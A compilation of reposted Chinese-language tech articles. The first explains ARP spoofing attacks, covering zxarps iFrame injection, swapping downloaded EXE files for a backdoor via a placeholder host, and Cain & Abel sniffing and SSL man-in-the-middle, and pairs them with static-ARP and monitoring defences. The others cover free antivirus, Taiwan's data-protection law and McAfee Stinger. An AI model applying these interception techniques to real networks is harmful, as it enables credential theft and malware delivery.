Abel可以用ARP掃描區網內主機，竊聽這些設備的POP3、Telnet、FTP、網芳等流量，還可以來偽造憑證，來執行SSL Man in the middle的行為。

ARP掛馬的原理
掛馬是甚麼，不需多做解釋，我現在要講的是ARP掛馬。

我想先介紹一個常見的ARP掛馬「zxarps」，這真的是最基本，而且是沒有隱藏技術的。實際上，有一些後門程式本身就內建ARP掛馬或竊聽功能。

先來一個簡單的用法。

將指定的IP段中用戶瀏覽的所有網站，都插入一個iFrame。

你注意，可以限定瀏覽者的IP。看得到這些資料的只有某些地區的人而已，外國人是看不到的。這對有心人士來說，是很好的功能，由於攻擊區域越小，所以被發現的機率越小，因此全世界其他地方，似乎都沒有發現異狀，另外還可以降低該主機的處理負擔。

再來觀察一個厲害的功能。你以為要看到Redirect轉址，才是惡意網站嗎？駭客有更狠的招數。

例如，一旦嗅探到目標下載檔案的副檔名是EXE，則更改Location:為http://xx.net/test.exe

你看，直接將你在信任的網站所下載的EXE檔，改成他後門的EXE檔，等你執行完的時候，還來得及發現嗎？

ARP掛馬工具「zxarps」將特定網頁伺服器所回傳的任何頁面，都插入一個連到www.yahoo.com.tw的隱形iFrame，這將讓所有瀏覽該網頁伺服器的使用者，不自覺地被導向www.yahoo.com.tw。

ARP駭客工具介紹
其實，還是得強調一件事，ARP攻擊這種駭客技術已經很成熟，在很多IDC機房，內網也都被運用到一種程度了。

上述是惡意的ARP掛馬，接下來再介紹其他利用ARP技術的駭客工具。有些中國製的ARP後門、ARP病毒，甚至做得比外國人寫的好，也更小。

在這些手法當中，你可能覺得ARP駭客工具似乎都是偷密碼，沒創意。事實上，才令人激賞的是，ARP工具也可以當網管工具！

Cain & Abel
最有名的就是oxid.it的Cain & Abel，這套工具不但可以用ARP掃描區網內主機，指定你要竊聽的主機，可以聽POP3、Telnet、FTP、網芳，還可以來偽造數位安全憑證，來執行SSL Man in the middle的竄改行為。

網絡執法官
藉由此工具，你可以管控區域網路內誰可以上網、誰不能上網，充分展現「不是網管也能當網管」的精神。其他像是網絡剪刀手、局域網終結者等工具，也可以切斷區域網路任何主機的連線，使其無法上網。

利用ARP 技術，同時也可以看到區域網路所有主機的IP，因此也能用在網路管理上，就像ARP P2P管理工具。例如在宿舍，有些人每天開著P2P養驢子下載、搶頻寬，如果懂得利用這種ARP P2P管理工具，即可藉由上述ARP的Man-in-the-middle技術，直接分配每個人頻寬。

這些工具顯示出目前ARP攻擊技術的成熟與危險。不少人都很清楚，集線器（Hub）的連線環境非常不安全，或者自以為處在交換器環境是安全的，這些是極為危險的觀念。

藉由這些工具，我想提醒你，要多認識ARP攻擊對目前我們網路所造成的影響，也希望你開始提防ARP掛馬或ARP置換攻擊，因為這些惡意行為已經出現在很多地方。

透過ARP，不只是用來作一些破解、側錄的行為，也可以用來 控管內部網路電腦能否上線，例如網絡執法官這套工具。

預防與偵測方式
對於ARP攻擊的預防方式其實很簡單。根據原本ARP規範，如要詢問主機收到ARP回應便更新主機上的ARP記錄，你可以使用arp–a 的指令，來顯示目前主機上所記錄的附近電腦網路位址。接著你可以使用靜態ARP，將ARP table中主機與MAC位址的對應記錄固定下來，這時可以利用arp –s 的指令來做到。

網路上也有許多所謂的ARP 防火牆（如AntiARP）或是ARP偵測工具，主要都是利用監控ARP request與reply封包，並在程式表裡的ARP記錄是否有異常。例如突然有一個ARP封包表明它是閘道，但是之前我知道的閘道MAC位址，明明就 不是後來那個ARP所說的，這就可能是ARP攻擊出現了（畢竟，閘道MAC位址很少常常換吧）。

企業與網管人員的因應之道
對於區域網路的安全性，多數網管或資安技術人員都會有一個迷思，那就是在最重要的伺服器上防護──不但在這些系統的前面安置防火牆、建立漏洞修補管理系統、安裝防毒軟體、甚至花費昂貴費用執行滲透測試。雖然該伺服器如同堡壘一樣堅固，卻疏忽了傳輸途徑上的風險。

這就像電影300壯士一般，就算Leonidas 率領的三百位斯巴達戰士，勇猛地將溫泉關守得滴水不漏，最後仍因為波斯軍團繞道包圍，還是難逃全軍覆沒的命運。

因此對於伺服器的保護，不能僅著眼於碉堡式的防禦，而是必須落實整體性防守。

以防護ARP掛馬來說，目前已經出現能符合這類企業區域網路環境防護需求的方案，其做法就是在區網內的主機上，安裝監控程式或建置監控主機，這些 措施不但能鎖定閘道的實體位址，也會監視相關ARP封包的狀態，持續掌握每個電腦IP位址與MAC的對應關係，並且能阻擋未經允許的電腦設備私自使用內部 網路。

此類產品的所宣稱的功能，大致有下列幾項：

1. 自動掃描區網內所有IP與MAC位址的對應

2. 設定IP/MAC位址對應並依照網管需求進行管控，甚至不需在用戶端安裝代理程式（Agent），即可達到員工監控或過濾的功能。

3. 偵測異常ARP封包

4. 偵測非法主機接入區域網路的動作

5. 依各網段進行管理

6. 集中控管與報表能力

7. 防治ARP病毒或木馬的擴散

接下來，我想用上面「企業區域網路ARP防護」的示意圖來解釋如何做到防護。

這是一個常見的區域網路，我們將ARP毒害威脅考量進去，再加上ARP防護監控方案的佈建架構。建構區域網路時，可參考這樣的防禦措施，以防止ARP相關威脅。

在圖中，每一臺伺服器上都設定了Static ARP，將閘道器的實體位址給綁定，這是目前區域網路防範ARP毒害的基本措施。而區域網路中，視需求另外設置了一部ARP企業監控主機。

在這個例子中，企業主可能需要監控員工電腦是否有異常行為，而網管人員在此所使用的方式是利用ARP手法來將流量導引至監控主機，而非正規的在閘 道口進行監控，這兩種方式都可達到流量分析與監控的目的，但若使用ARP手法須留意該監控主機本身的效能，因為該主機需要處理區網內每一臺需監控的個人電 腦。

另外，企業區網中常見的一個威脅，便是私接筆記型電腦或個人電腦。利用監控主機ARP監控，可記錄原本存在區域網路中的伺服器與個人電腦，一旦有 私接的電腦接上區域網路，因它們會發送ARP相關封包，將會被監控主機偵測到，而經由比對原本的IP與MAC位址列表，便可獲知是哪一臺電腦主機。

由於目前ARP監控軟體中都有內建網卡廠商的MAC位址範圍，因此可得知網卡廠牌，協助網管人員盡速找出私接主機。

最後，若是隔壁部門的伺服器遭駭、對區網發動ARP毒害，這時監控伺服器將會比對這些ARP封包，發現有人欲冒充網路閘道設備，這時監控伺服器便會記錄異常行為並發出警告，讓系統管理人員了解目前區域網路確實是存在惡意主機，不會毫無所悉。

1 個人電腦可由「合法」的ARP Poison方式，導引到監控主機，以便管理或內容過濾。 2 私接的筆電連上網路後，監控主機將會察覺，並發送警告給管理者。 3 如果遭ARP毒害的外單位主機想要詐騙網頁伺服器，也無法完成，因為會被偵測出來。

用arp–a能顯示目前主機上的ARP table，用arp –s可將ARP table中主機與MAC位址的對應記錄固定下來。

內網安全蒙上新陰影
這次可疑網站轉址事件，造成許多民眾與資安專家的恐慌，在資訊不足的情況之下，眾說紛紜是情有可原的。

而目前最夯的ARP掛馬，已經非常氾濫與流行，許多機房其實未必安全，即使你確實將自己的伺服器保護得很好，例如修補、裝防毒軟體甚至定時檢查系 統，但只要鄰居遭駭，你一樣會受到影響。除了本文所述的流量被插封包，可能連主機帳號密碼、使用者資料全都被竊取，這是目前許多機房並未注意的問題點，我 希望藉由過去的一些事件與ARP攻擊工具的介紹，讓你了解這項手法，並能更加注意區域網路安全。


編按：作者是一位經驗豐富的網路安全專家，也深諳國內外資訊安全相關的技術。基於一些個人理由，他不便具名發表本文，但透過這篇文章的介紹，他想提醒企業正視這項網路技術遭惡意人士濫用的嚴重性，以及可以反過來應用強化網路控管的可能性。


原文網址：http://www.ithome.com.tw/itadm/article.php?c=54461

[news]防毒軟體 如何抉擇?

防毒軟體 如何抉擇?

現在網絡上的陷阱越來越多，蠕蟲（Worm）、木馬（Trojan）和駭客（Hack）等病毒層出不窮，每個人都知道電腦應該要安裝一套防毒軟體來隔絕病毒的入侵。但在芸芸市場中，就有整10家不同的防毒軟體廠商供選擇，如果再加上網絡上免費的防毒軟體，總共就有大約20多種，使用者應該如何作出抉擇呢？使用者就必須先建立正確的防毒觀念：

1.防毒軟體是萬能的？

許多使用者都有一個迷思，以為只要安裝了防毒軟體，就可以從此高枕無憂，再也不需要擔心電腦的安全問題。但事實是，任何的網絡安全專家都會告訴你，天底下沒有一套防毒軟體是百分百安全的，因為防毒軟的作用是協助你保護電腦的安全，而非安裝以後就可以百毒不侵、刀槍不入。如果總是在網絡上胡亂點擊或登入一些高風險的網站，那再好的防毒軟體恐怕都不能保證你能全身而退。

2.免費防毒軟體，保護比較差?

目前市面上的防毒軟體，不管是免費或是付費的，基本上都能有效防護他們「承諾範圍」以內的危險。付費防毒軟體的優點是，他們會比較貼心地將不同領域的防護功能整合起來，省下使用者自行尋找解決方案所花費的時間；免費防毒軟體雖然保護範圍相對來說比較窄，但如果使用者懂得針對自己電腦的需求，尋找對應的軟體來進行防護，還是可以發揮出相當的功效。

3.評價高的防毒軟體一定好？

國外許多著名的科技網站，每年都會對各家防毒軟體進行一系列的測試和評比，並依照結果制定排名和打分數，供使用者選擇購買時作為一個參考的依據。但有時，防毒軟體評分的高低與好不好用，其實是兩碼事。

例如有些防毒軟體比較敏感，電腦有任何風吹草動警告訊號就會不斷閃現，搞到使用者煩不勝煩；有些防毒能力高的軟體，在進行電腦掃瞄時會大量佔用資源，拖慢了電腦運作的速度，甚至會出現軟體監控電腦，造成某些軟體不能使用。以上這些狀況，都是分數不會告訴你的。

因此，如果你要選擇一套防毒軟體，尤其是免費的防毒軟體，最好還是先試用一段時間，才能確定該軟體是否適合自己。

雲端解毒零時差

對一般使用者來說，為電腦選擇防毒軟體，免費絕對是最重要的選項，接下來考慮的才是防護功能的強柔和是否會佔用電腦資源，拖慢其運作速度。

近年來，推崇網絡資源共享的雲端運算技術（Cloud Computing）屢次高居電腦界最有發展潛力的前3位，而利用這個技術對病毒進行偵測、掃除的雲端防毒軟體，也逐漸成為防毒軟體的新趨勢，並得到廣大網民的喜愛。

雲端防毒軟體與傳統防毒軟體不同之處在於，傳統防毒軟體總是面對病毒碼更新不夠快的窘境，根據統計，全球網絡平均每天會發現3萬7000個新病毒、蠕蟲、木馬及其他對網絡構成威脅的惡意程式，但防毒公司從搜集、檢驗、確認，到將病毒碼發佈給使用者的這一段時間，病毒早已在網絡上四處流竄，而最新的病毒還在不斷被製造和散播，因此總是讓防毒公司防不勝防。

最快速度偵測新病毒

反觀雲端防毒軟體，利用雲端運算技術的好處，將每一個用戶都當做感應器，一旦發現可疑的檔案，使用者的防毒軟體就會立刻將新病毒傳送到網絡進行判別、解毒，而雲端主機也可即時更新病毒定義檔，進而做到掃毒、解毒零時差。

科技界有一句話是這樣講的：「最可怕的電腦病毒並不是已知的99%，而是未知的1%」，以最快的速度偵測出新病毒，就能將它的破壞減到最低，這是雲端防毒軟體最大的優點。

另外，雲端防毒軟體如同一種線上即時的資料庫，它只在用戶端的電腦上保存小部份目前最活躍、危險的病毒定義檔。這樣的方式，除了免去傳統防毒軟體更新病毒碼的動作，也因為沒有大量的病毒資料需要儲存，所以基本上不會佔用到電腦的資源。

下面介紹4款即免費，防護效果又不錯的雲端防毒軟體，它們各具特點，讀者可以依本身的需求進行選擇。

軟體名稱：Microsoft Security Essentials

下載網址：

http://www.microsoft.com/security_essentials/

軟體特徵：免費下載，但通過微軟正版驗證

Microsoft Security Essentials（MSE）是微軟（Windows）推出Windows 7上市前推出的一套免費防毒軟體，檔案的體積僅為4.7MB，佔用的空間非常有限，卻提供了病毒、木馬以及多種惡意軟體的即時防護功能，並提供定期的病毒碼更新。

掃瞄方面，MSE有快速掃瞄、完整掃瞄和手動掃瞄等選項，雖然沒有搭配網絡防護的功能，但由於微軟系統本身就備有防火牆，兩者搭配使用效果還是不錯的。

與其他防毒軟體一樣，MSE在下載、安裝時並不包含任何病毒碼檔案，用戶安裝完成後必須第一時間在網絡上下載最新的病毒碼，才能為電腦帶來最即時的保護。

軟體名稱：Comodo Internet Security

下載網址：http://personalfirewall.comodo.com

軟體特徵：免費下載，功能完整的網絡及病毒三合一防護

防毒、防木馬間諜、防網絡入侵是電腦所面臨的三大威脅，尤其現在網絡上病毒、木馬的界限越來越模糊，Comodo Internet Security（CIS）將防毒、防駭以及防火牆三大功能結合在一起，讓使用者一次就能裝到好，免去尋找其他軟體的困擾。

CIS佔用的系統資源相當小，進行掃瞄時，電腦可以同時操作其他軟體而不會有任何影響。不過它的掃瞄速度有點緩慢，就算選擇精簡型的關鍵區域掃瞄，也要耗費一兩個小時以上的時間才能完成。

防火牆（Firewall）的防護是CIS的強項，裡面有許多功能讓使用者自行設定。你可以隨意在這裡定義一些可以信任的應用程式，開啟時不受防火牆的監控，或當你覺得電腦有異常的連線時，到這裡檢視系統的狀況，找出可疑的程式。

軟體名稱：Panda Cloud Antivirus

下載網址：http://www.cloudantivirus.com/en/

軟體特徵：免費下載，防毒效果不錯，是目前網絡流傳度最廣的雲端防毒軟體

Panda Cloud Antivirus（PCA）為西班牙公司Panda Security推出的一套免費防毒軟體，是目前網路上最「夯」的雲端防毒軟體之一。

與一般自由下載安裝的防毒軟體不同的是，PCA需要帳號密碼登入才可正常安裝使用，因此使用者需要多一個步驟，即免費註冊一個自己的帳號，才能將防毒軟體下載安裝到自己的電腦。

PCA頁面設計簡單，軟體效能與系統相容性方面都相當不錯，加上大規模簡化了軟體的操作與設定，不論是執行效率、運作速度與掃毒速度都相當快。不過值得注意的是，PCA的「排他性」相當重，必須先移除原有的防毒軟體才能成功安裝，但對還在煩惱應該為電腦安裝什麼防毒軟體的使用者來說，不失為一個不錯的選擇。

軟體名稱：Immunet Protect

下載網址：http://www.immunet.com/protect

軟體特徵：免費下載，相容性高，是「第二套」防毒軟體的最佳選擇

Immunet Protect是一套去年8月才剛發佈的防毒軟體，號稱是第一套利用全球網絡社區的力量來保護所有用戶的防毒軟體。論名氣，它絕對比不上市場上一眾老牌防毒軟體，但當你知道它是由全球知名防毒軟體公司賽門鐵克（Symantec）的前副總裁與響應中心主管共同成立以後，可能就會對它另眼相看，並產生多一些的信心。

以往的防毒軟體都有很強烈的「排他性」，同時安裝兩套防毒軟體就猶如「一山不能藏二虎」般，容易發生不相容和誤刪檔案的狀況。但Immunet Protect卻是一套非常強調「相容性」的防毒軟體，用戶不需要移除現有的防毒系統，進而達到雙管齊下、雙倍保護的效果。

值得注意的是，Immunet Protect提供了Windows 32bit與Windows 64bit兩種作業系統版本的安裝檔案，用戶下載時必須針對自己電腦的系統做選擇，才能成功進行安裝。

南洋商報／資訊網·整理：梁明樂·2010.03.15

原文網址：http://tech.sinchew-i.com/sc/node/153062?tid=32

[news]個資法7月擴及無店面零售業，中小型業者吃不消

個資法7月擴及無店面零售業，中小型業者吃不消

文/黃彥棻 (記者) 2010-03-30

今年7月起，網購和型錄業者都必須受《電腦處理個人資料保護法》的規範，只要擁有客戶資料，就必須向主管機關申請處理個資的許可執照，新增的成本，將對2萬家中小型業者造成負擔


重 點
● 無店面零售業從今年7月指定適用現行個資法
● 指定適用衍生額外成本，不利中小型無店面零售業
● 力促新版個資法三讀通過才是解決之道

為了遏止網購業者洩露個資而讓網路詐騙有機可乘，政府不等新版個資法的通過，在2月9日就指定無店面零售業者自7月起納入現行《電腦處理個人資料保護法》的適用範圍。中華無店面零售業協會表示，這對於臺灣2萬多家經營電子商務的中小企業而言將是不小的負擔。

無店面零售業指定適用電腦處理個人資料保護法
根據行政院公告，經濟部和法務部指定無店面零售業者（包括以網際網路及型錄方式零售商品的公司行號），成為《電腦處理個人資料保護法》第3條第7款第3目所規範的非公務機關，並於今年7月1日起適用個資法。

《電腦處理個人資料保護法》自1995年頒佈迄今，主要是規範公務機關以及屬於非公務機關的八大行業，在以電腦處理個人資料時，不得使民眾人格權受侵害，促進個人資料利用的合理性。 該法指定適用的八大行業，包括了徵信、醫院、學校、電信、金融、證券、保險及大眾傳播等所謂的八大行業。不過，根據該法第三條規定，法務部亦可和事業主管機關共同決議，透過「指定適用」的方式，再把其他行業也納入個資法的適用範圍。

例如，法務部和經濟部便在2005年1月1日起，指定「不動產仲介經紀業」與「開放電腦網路登錄之就業服務業」（即人力銀行）適用該法；自2005年2月1日起，則指定「百貨公司業」與「零售式量販業」適用該法。在2009年1月1日起，教育部也指定「文理類補習班除語文類科」適用個資法。

據165防詐騙專線的統計，有許多詐騙事件都肇因於網購、線上購物業者處理客戶資料失當，然而這些產業卻因為不適用於個資法，法律無法從約束，即便業者洩露了個資，受害民眾也無法以現行個資法求償。

在民間高聲呼籲政府規範網購業者，以遏止個資外洩而導致的詐騙事件，經濟部商業司從2008年就與相關業者開會討論「指定適用」的方式，以規範無店面零售業者處理個人資料處理的行為準則。直到2009年由法務部報行政院同意後，確定納入適用現行法律。

適用現行個資法，網購業者需登記並取得執照
雖然立法院正在審議的新版《個人資料保護法》，已經不再指定特定適用產業，而是所有行業都得遵循，不過政府為了避免詐騙事件越演越烈，在新法尚未通過前，就要求無店面零售業者自7月1日起適用個資法，企圖要求相關業者做好個資保護，以杜絕詐騙事件。

不過，依現行個資法的規定，業者必須先跟主管機關登記以取得執照，中華無店面零售業協會秘書長蕭美麗表示，主管機關核准後，業者必須在政府公報及當地報紙刊登保護細節，且能供人查閱。如果相關的個資完全維護計畫有任何變更，包括業者終止服務，都必須在期限內辦理變更與終止登記。


無店面零售業從今年7月1日起，指定適用現行電腦處理個人資料保護法，作為新版個資法立法通過前的折衷作為。

博客來行銷與公關Team經理楊雅雯表示，博客來為了因應新版個資法，已經就作業流程和IT系統檢討因應策略，要適用現行個資法並不是問題，比較大的問題在於申請執照與許可的細節迄今都尚未有進一步的訊息，這對於想要守法的企業而言，有很高的不確定性，徒增企業適法的難度。

經濟部商業司表示，執照申請辦法相關草案預計在3、4月出爐，6月底前會公布申請辦法與流程。業者只要在指定適法日（7月1日）開始後的半年內，完成相關的執照申請即可。然而，過程中若新版個資法三讀通過，因為新法規定所有行業一體適用，業者就不必再繼續申請執照了。

指定適法徒增無店面零售業者額外營運成本
蕭美麗分析，此次政府指定無店面零售業者適用現行個資法，不只業者的經營成本會增加，行政機關也得負擔因應業者申請執照所衍生的行政程序處理成本。

業者負擔的成本，最直接的是申請執照許可的行政作業成本，以及強化資訊安全的成本，此外，客戶服務與時間的成本也會增加，像是業者為了保護個資，因在物流配送單上遮罩部分資訊所造成的送貨遲延、配送效率降低，都是業者不得不面臨的額外支出。

蕭美麗認為，立法院應該儘速通過新版個資法，才是解決現行法律問題的根本辦法。幾家無店面零售業者亦認為，儘速促使新版個資法三讀通過，會比貿然指定特定產業適用現行法律來得有用。

業者亦建議政府訂出一套資安檢視規範供業者自行檢視，不然即便投入許多資源強化內部資安的保護，但這些措施是否已經符合政府的要求，是否可以作為日後舉證的項目，則是業者最為關切的問題。

電視購物業者ViVa TV表示，該公司已經按照現行個資法及新版個資法草案，做好資料保護措揓，行政院此次的公告對該公司不會造成衝擊。他們的做法像是採用應用程式防火牆，在個人端電腦也安裝行為監控軟體，而電話行銷及客戶服務部門同仁除了禁止攜帶手機及攝錄影，或任何具拍照功能設備，也沒有紙筆可供抄寫。

蕭美麗表示，大型業者要符合法規遵循問題不大，但中小型業者則需要多一點的時間來學習與適應，建議政府應有配套措施協助中小型業者，以免業者觸法。文⊙黃彥棻




文章出處：http://www.ithome.com.tw/itadm/article.php?c=60262

[工具]免安裝又免費的掃毒軟體「McAfee AVERT Stinger」

● 軟體身分證

軟體名稱：McAfee AVERT Stinger
軟體功能：免費掃毒軟體（免安裝）
軟體首頁：http://www.mcafee.com/tw/

軟體版本：10.1.0.815 (03/26/2010)
介面語言：英文
系統支援：WindowsME/XP/Vista(Windows 7 測試可以使用)
官方教學網址：http://vil.nai.com/vil/stinger/

軟體下載載點：http://download.nai.com/products/mcafee-avert/stinger1010815.exe

檔案大小：4.60 MB
軟體簡介：
McAfee 公司所推出的免費掃瞄軟體，McAfee AVERT Stinger是一款單獨用來快速檢查電腦，專門用來檢測及消除、修復、刪除特殊的病毒，只是用來安全輔助工具，並不具備即時防護，無法將全方位的防毒軟體進行取代，但是它相當於一個掃毒工具可以讓一些電腦系統管理者用來清除已被感染病毒的電腦上的病毒，它使用了新一代的掃描引擎技術，所以可以使用在防毒軟體被病毒搞掛、失效或者甚至還沒安裝，此時電腦又有出現一些中毒的癥狀時，就可以先使用這免安裝的掃毒工具來急救，嘗試刪除。（依照網友表示知名的Sobig、Nimda、W32/Blaster.worm（疾風病毒）可以進行刪除動作）

軟體圖文說明：

（McAfee AVERT Stinger程式主畫面）

按鈕說明：

Scan Now：開始掃瞄
Stop：停止掃瞄
Preferences：程式參數設定
List Viruses：可掃瞄清除的病毒名稱清單
Add：手動輸入增加掃瞄目標
Browse：瀏覽增加掃瞄目標
Remove：移除掃瞄目標

（McAfee AVERT Stinger掃瞄畫面）

（McAfee AVERT Stinger的程式設定項目）



（McAfee AVERT Stinger可掃瞄清除的病毒名稱清單）